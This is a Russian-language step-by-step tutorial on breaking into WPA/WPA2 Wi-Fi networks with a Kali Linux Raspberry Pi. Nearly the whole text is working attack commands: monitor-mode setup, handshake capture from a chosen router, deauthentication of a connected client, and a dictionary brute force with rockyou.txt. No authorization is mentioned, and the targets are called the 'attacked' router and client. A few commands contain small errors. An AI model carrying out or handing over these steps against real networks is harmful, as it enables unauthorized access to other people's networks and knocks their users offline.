В статье обозначу основные аспекты по взлому wifi с использованием:
— Raspberry Pi 3 с предустановленной ОС Kali Linux (в моес случаем Linux kali 4.19.81-Re4son-v7+ #1 SMP Wed Nov 6 10:16:47 AEDT 2019 armv7l GNU/Linux)
— usb wifi адаптера
Очередность взлома:
1. Получить файл handshake (рукопожатия)
2. На основе рукопожатия и словаря паролей rockyou.txt выполнить бутфорс (метод последовательного перебора паролей) паролей.
Step-by-step
Устанавливаем usb адаптер в Raspberry, в дальнейшем его будем использовать в режиме монитора.
Устанавливаем aircrack-ng
sudo apt-get install aircrack-ng
Запускаем службу монитора airmon-ng
airmon-ng
Запускаем монитор с сети usb адаптера
airmon-ng start wlan1
включаем режим монитора
iwconfig
Возможно понадобиться убить процессы держащие интерфейс
airmon-ng check kill
После повторной команды iwconfig появится интерфейс монитора «wlan1mon»
Сканируем доступные сети wifi
airodump-ng wlan1mon
Выбираем роутер для атаки (с WPA или WPA2)
Выписываем MAC адрес и канал СH
Запускаем монитор выбранного роутера для получения рукопожатия
airodump-ng -c 3 --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/
Где -с — номер канала, —bssid — MAC роутера, -w директория для сохрания .cap файла с пойманным рукопожатием
Рукопожатие будет отслеженно как только клиент подключиться к сети Wifi, тогда в верхнем правом углу появится WPA(2) handshake: MAC
Если нет времени ждать подключения клиента, можно воспользоваться методом деаутенфикации, когда пользователю нужно принудительно повторно авторизоваться на роутере:
aireplay-ng -0 3 -a MAC1 -c MAC2 wlan1mon
, где MAC1 — mac атакуемого роутера, MAC2 — mac атакуеого клиента, для повторной авторизации.
Переименовываем созданные файл с рукопожатием
mv ./-01.cap name.cap
Для подбора паролей с помощью naive-hashcat необходимо сконвертировать .cap в .xccpax:
git clone https://github.com/hashcat/hashcat-utils.git cd hashcat-utils/src/ make sudo mv *.bin /usr/local/bin/ sudo cp -a *.pl /usr/local/bin/
cap2hccapx.bin name.cap name.hccapx
Скачиваем словарь паролей rockyou.txt
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Запускаем процедуру подбора пароля на wifi:
aircrack-ng -a2 -b MAC -w rockyou.txt name.cap
где -a2 — WPA2, (a1-WPA),
-b MAC — макадрес роутера
-w rockyou.txt словарь паролей
name.cap — перехваченное рукопожатие
Источник: https://www.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux